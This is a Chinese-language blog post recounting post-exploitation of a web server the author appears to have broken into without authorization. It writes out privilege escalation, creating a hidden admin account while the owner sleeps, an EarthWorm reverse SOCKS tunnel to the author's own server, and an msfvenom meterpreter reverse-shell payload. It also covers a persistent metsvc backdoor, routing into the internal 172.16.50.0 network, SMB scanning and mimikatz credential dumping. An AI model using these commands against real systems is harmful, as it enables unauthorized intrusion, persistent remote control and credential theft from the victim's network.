文章目录
0x01初次探索
前不久拿到一个站的shell,但是对内网渗透不熟悉,于是这几天琢磨了一下内网渗透,借此记录一下
拿到了shell后发现,仅仅是iis权限,于是看下补丁拿到https://bugs.hacking8.com/tiquan/查看有什么能够提权利用的补丁没有打,顺利找到后
提权成功后,query user一下看看是否有用户在线,确认没有后(毕竟是对方的深夜时刻)临时创建一个administrator权限用户,3389登录一下,此时发现无法连接
ping一下发现ip不同,显然需要代理,由于第一次使用,不得不学习一下
工具使用EarthWorm+proxifier,象征性的介绍一下:
EarthWorm是一款用于开启 SOCKS v5 代理服务的工具,基于标准 C 开发,可提供多平台间的转接通讯,用于复杂网络环境下的数据转发;
Proxifier是一款功能非常强大的socks5客户端,可以让不支持通过代理服务器工作的网络程序能通过HTTPS或SOCKS代理或代理链。
端口转发原理不详述,百度了解一下,大佬们讲的很清楚。
首先现在服务器上开启ew就行监听与转发
root@iZ2zeg3h4a24fnp0q315gfZ:~# ./ew_for_linux64 -s rcsocks -l 9876 -e 9867
rcsocks 0.0.0.0:9876 <--[10000 usec]--> 0.0.0.0:9867
init cmd_server_for_rc here
start listen port here
等待目标靶机访问9867端口
肉鸡中上传ew,访问服务器9867端口,打通转发通道的一半路程
./ew -s rssocks -d ip -e 9867
再本地物理机上,使用proxifier代理服务器的9876端口,从而打开另一半通道实现端口转发整个过程
此时3389连接即可,图中可以发现mstsc.exe程序的流量在走我们打通的通道
emmmm,以上只是自己(作为一只菜鸡)的探索,后来经过大佬们提起最好是反弹一个shell去操作,不会有不必要的麻烦。
于是上传一个msfpayload(最好免杀),administrator权限执行,反弹一个merterpreter会话,当然你也可以使用MSF生成一个反弹的 ps1的shell
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=ip lport=port-f psh-reflection>/tmp/search.ps1
会有些许免杀作用,且其可用利用系统访问范围几乎是全覆盖的
shell上线后,ps一下进程,转移一下进程,不会关闭的那种,当然服务器会一直开机,一般不会做其他操作
或者建立一个持续后门
然后
use exploit/multi/handler
set payload windows/metsvc_bind_tcp
set RHOST ip
set LPORT 31337
exploit
等待连接即可
以上是一点小插曲,下面开始内网渗透(可惜不是域,只是工作组)
内网渗透时,需要路由转发一波
列举该机器所在的网段
找到相应的网段,添加网关
参看时候设置成功
可以发现:目标:172.16.50.0 掩码:255.255.25.0 下一跳网关:Session 2
这里的 Session 2,即当前被攻击目标主机与MSF平台建立的meterperter会话,OK, MSF平台有了去往内网网段的路由,我们就可以直接使用MSF平台对内网的主机进行进一步的渗透利用了
下面就是信息收集,既然是windows系统为什么不smb一下呢?
meterpreter > background
[*] Backgrounding session 2…
放到后台后,使用msf收集模块中的smb_version 扫描一遍该网段存活主机的版本
然后使用smb的exp打了一遍发现似乎没什么用,于是继续想办法,mimikatz抓下密码,有可能用同一个密码(rdp服务)
meterpreter > load mimikatz
Loading extension mimikatz...
[!] Loaded x86 Mimikatz on an x64 architecture.
[!] Loaded Mimikatz on a newer OS (Windows 2012 (6.2 Build 9200).).
Did you mean to 'load kiwi' instead?
Success.
没有发现明文,我本来以为merterpreter自带的有问题,于是上传一个mimikatz然后抓取一下还是没有找到明文,后来才知道,2012服务器中想读取明文需要修改注册表然后重启电脑可以,但是想想不能重启,只能继续想其他办法。(未完待续)
0x02 小tips
过程中的小tips(太菜了,只是这样记录)
1、iis服务器中pe结构的可执行文件,后缀名不会影响执行
2、/appcmd list site /config /xml > c:/sites.xml 可以显示iis配置的细节
3、在渗透另一个时,可以从连接的服务处进行入手(进入的某数据库服务器),输入netstat -abnop tcp,可以发现
显然改了端口,可以摸到另一个web服务器。
4、缺什么补什么大法,在渗透另一个主机的时候,发现nbtstat命令不能用,于是
本机新建一个nbtstat.exe(当然要操作系统位数要一样),然后上传上去执行即可。
0x03尾记
一篇没有干货的文章,菜鸡我还在学习后渗透中,记录知识点只是为了以后忘记时可以更好地温故知新,毕竟自己太菜了,如有错误,感谢大佬指正。